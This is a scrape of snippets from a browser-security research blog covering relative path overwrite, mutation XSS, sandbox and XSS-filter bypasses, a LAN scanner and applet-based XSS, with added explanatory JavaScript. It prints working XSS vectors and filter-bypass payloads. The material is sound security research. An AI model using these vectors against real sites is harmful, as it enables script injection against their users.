thespanner.co.uk
RPO
http://www.thespanner.co.uk/2014/03/21/rpo
Javascript blog with messed up syntax inside. Friday, 21 March 2014. https://hackvertor.co.uk/public. <link href="styles.css" rel="stylesheet" type="text/css" />. The link element above references styles.css using a relative URL: the browser resolves it against the URL of the page it is on, so where you are in the site's directory structure decides which file is loaded. For example, if you were in a directory called xyz then the style sheet would be loaded from xyz/styles.css. I noticed something interesting with relative styles, manipulating the path of ...
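The resolution rule the RPO post builds on, shown as an added example (this is not code from the post or from the blog): a relative href such as "styles.css" is resolved against the document's own URL, so any extra path segments on the page URL move the stylesheet request with them. The hostnames, paths and the PATH_INFO routing rule used here are hypothetical; the routing rule only stands in for a server that serves the same script for any trailing path.

```javascript
// Added example, not code from the original post. It shows the URL resolution
// that relative path overwrite (RPO) relies on: a relative href such as
// "styles.css" is resolved against the *document's* URL, so extra path
// segments (PATH_INFO) change where the stylesheet is loaded from.
// Hostnames, paths and the PATH_INFO routing rule below are hypothetical.

const STYLESHEET_HREF = "styles.css"; // from <link href="styles.css" rel="stylesheet">

// Resolve a relative URL the way a browser does for <link href=...>.
function resolveStylesheet(documentUrl, href = STYLESHEET_HREF) {
  return new URL(href, documentUrl).href;
}

// Hypothetical server routing: the first path segment ending in ".php" is the
// script; anything after it is PATH_INFO and is answered by that same script
// (the behaviour Apache's AcceptPathInfo gives you). Returns the script path
// or null when no script segment is present.
function scriptFor(pathname) {
  const m = pathname.match(/^(\/(?:[^/]+\/)*[^/]+\.php)(\/.*)?$/);
  return m ? m[1] : null;
}

// RPO condition: the stylesheet URL the browser computes is routed to the
// same script as the page, so the page's own HTML (which may contain
// attacker-influenced text) is fetched and interpreted as CSS instead of the
// intended stylesheet.
function rpoCandidate(documentUrl, href = STYLESHEET_HREF) {
  const doc = new URL(documentUrl);
  const css = new URL(resolveStylesheet(documentUrl, href));
  const docScript = scriptFor(doc.pathname);
  const cssScript = scriptFor(css.pathname);
  return {
    stylesheetUrl: css.href,
    servedByPageScript: docScript !== null && docScript === cssScript,
  };
}

// Stand-alone run: compare the normal page URL with one carrying PATH_INFO.
for (const u of ["http://example.test/xyz/index.php", "http://example.test/xyz/index.php/a/b/"]) {
  console.log(u, "->", JSON.stringify(rpoCandidate(u)));
}
```

The practical check is the second case: a trailing slash (or any extra segment) on a URL that the server still routes to index.php makes the browser ask index.php for styles.css, and a server that answers with the page body is an RPO candidate. Serving stylesheets from absolute paths, or rejecting PATH_INFO on scripts that do not need it, removes the ambiguity.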
thespanner.co.uk
mXSS
http://www.thespanner.co.uk/2014/05/06/mxss
Tuesday, 6 May 2014. Mutation XSS was coined by me and Mario Heiderich to describe an XSS vector that is mutated from a safe state into an unsafe, unfiltered state. The most common form of mXSS comes from incorrect reads of innerHTML. A good example of mXSS was discovered by Mario, where the listing element mutated its contents to execute XSS. <listing><img src=1 onerror=alert(1)></listing>. <listing id=x><img src=1 onerror=alert(1)></listing>. If you try the above ve...
thespanner.co.uk
HTML scriptless attacks
http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks
Wednesday, 21 December 2011. Following up on @lcamtuf's post about a "post XSS" world, I thought I'd chip in with some vectors he missed. The textarea consumption technique he mentioned isn't new and wasn't invented by "Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Colin Jackson"; it was openly discussed on sla.ckers for many years (as usual), but anyway, let's discuss vectors. Button as a scriptless vector. Option as a scriptless vector. Another interesting...
thespanner.co.uk
MentalJS bypasses
http://www.thespanner.co.uk/2014/06/24/mentaljs-bypasses
Tuesday, 24 June 2014. I managed to find time to fix a couple of MentalJS bypasses by LeverOne and Soroush Dalili (@irsdl). LeverOne's vector was outstanding since it bypassed the parsing itself, which is no easy task. The vector was as follows: i/'/ alert(location);0)break/ '). for (var i$i$; / '/ alert(location);0)break/ '). for (var i$;i$ / '/ alert(location);0)break/ ').
thespanner.co.uk
XSS Auditor bypass
http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass
Tuesday, 10 February 2015. <script>x = "MY INJECTION"</script>. As every XSS hacker knows, you can use a "</script>" block to escape out of the script block and inject an HTML XSS vector. So I broke out of the script block and used the trailing quote to form my vector, like so: </script><script>alert(1)". You could of course use a standard. But what if quotes are filtered? x = "</script><svg><script>alert(1)"";
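Why the "</script>" trick works, as an added example that is not from the post: the HTML tokenizer ends script data at the first "</script" it sees (case-insensitive, followed by whitespace, "/" or ">") and knows nothing about the JavaScript string the injection sits in. This block does not model Chrome's XSS Auditor itself, only the parser behaviour the bypass starts from; the page template, the injection value and the renderSafe escaping are constructed for the example.

```javascript
// Added example, not code from the original post. It models the part of the
// HTML tokenizer that matters for the "</script>" trick: script data ends at
// the first "</script" (case-insensitive, followed by whitespace, "/" or ">"),
// whatever the JavaScript inside it is doing, so a quoted string cannot
// protect it. The template, the injection and the escaping are constructed.

// Return the raw text of every <script> element in `html`, split the way a
// browser's tokenizer splits it (script data state -> end tag open state).
function scriptBodies(html) {
  const bodies = [];
  const open = /<script(?:\s[^>]*)?>/gi;
  let m;
  while ((m = open.exec(html)) !== null) {
    const start = m.index + m[0].length;
    const close = /<\/script(?=[\s/>])/gi; // what actually terminates script data
    close.lastIndex = start;
    const c = close.exec(html);
    const end = c ? c.index : html.length;
    bodies.push(html.slice(start, end));
    open.lastIndex = c ? c.index + c[0].length : html.length;
  }
  return bodies;
}

// Unsafe template: the injection lands inside a JS string literal, but the
// HTML parser does not know or care about JS string boundaries.
function renderUnsafe(value) {
  return `<script>x = "${value}"</script>`;
}

// Safe template: JSON.stringify handles quotes and backslashes, and "<" / ">"
// are turned into \u escapes so the byte sequence "</script" can never appear
// in the emitted script data.
function renderSafe(value) {
  const js = JSON.stringify(value).replace(/</g, "\\u003c").replace(/>/g, "\\u003e");
  return `<script>x = ${js}</script>`;
}

const INJECTION = '</script><script>alert(1)'; // constructed attacker input

// Runs both templates through the tokenizer model and returns the script
// bodies each one produces.
function demo() {
  return {
    unsafe: scriptBodies(renderUnsafe(INJECTION)),
    safe: scriptBodies(renderSafe(INJECTION)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

With the unsafe template the tokenizer produces two script bodies, and the second one (alert(1) followed by the template's own trailing quote) is what the post turns into a working vector; with the escaped template there is only one body and the injection stays inside the string.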
thespanner.co.uk
2015 June
http://www.thespanner.co.uk/2015/06
Archives for the Month of June, 2015. New IE mutation vector. Wednesday, 17 June 2015. I was messing around with a filter that didn't correctly filter attribute names and allowed a blank one, which enabled me to bypass it. I thought maybe IE had similar issues when rewriting innerHTML. Yes it does, of course. The filter bypass worked like this: <img = <script>alert(1)</script>. The filter incorrectly assumed it was still inside […].
thespanner.co.uk
Security
http://www.thespanner.co.uk/category/security
Archives for the 'Security' Category. New IE mutation vector. Wednesday, 17 June 2015. How I smashed MentalJS. Sunday, 3 May 2015. MentalJS DOM bypass. Friday, 6 March 2015. Another XSS auditor bypass. Thursday, 19 February 2015. This bug is similar to the last one I posted but executes in a different context. It requires an existing script a...
thespanner.co.uk
Online Javascript LAN scanner
http://www.thespanner.co.uk/2007/07/28/online-javascript-lan-scanner
Saturday, 28 July 2007. I've really enjoyed making this tool; it started off as a port scanner, then it evolved into a router scanner, and now I've decided to accept any device on a LAN. The code now works on Firefox and IE7 (which was a pain); I haven't managed to test it on any other browser, so please leave a comment if you find any problems. IE7 is super quick to scan; I think this is because timed-out connections don't a...
thespanner.co.uk
java
http://www.thespanner.co.uk/category/java
Archives for the 'java' Category. Java Serialization. Tuesday, 6 May 2014. In this post I will explore Java serialized applets and how they can be used for XSS. A serialized applet contains code that can be easily stored and loaded. Java supports an attribute called object which accepts a URL to a serialized class file; this allows us to load applets of our choosing provided they […]. On Sandboxing and parsing jQuery in 100ms.
thespanner.co.uk
Java Serialization
http://www.thespanner.co.uk/2014/05/06/java-serialization
Tuesday, 6 May 2014. In order to create a serializable Java applet you need the following code (you also need to add plugin.jar to the class path):
import java.applet.*;
import netscape.javascript.*;
public class XSS extends Applet implements java.io.Serializable {
    public void init() {
        JSObject win = (JSObject) JSObject.getWindow(this);
        ...
The applet is then loaded from the serialized data rather than the class: <applet object="xss.ser" codebase="http://any url here containing the class and serialized data"></applet>. <applet param ...